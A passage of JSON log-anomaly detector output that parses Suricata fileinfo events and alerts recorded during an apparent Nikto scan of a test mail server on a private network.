"/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.242016, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46854, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2006664539188459, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80", "/parser/model/time": 1583349514.243409, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46856, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htaccess~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.243594, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46856, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1380698825602070, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80", "/parser/model/time": 1583349514.244892, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46858, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso-ru", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.245043, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46858, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1686874159233612, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": 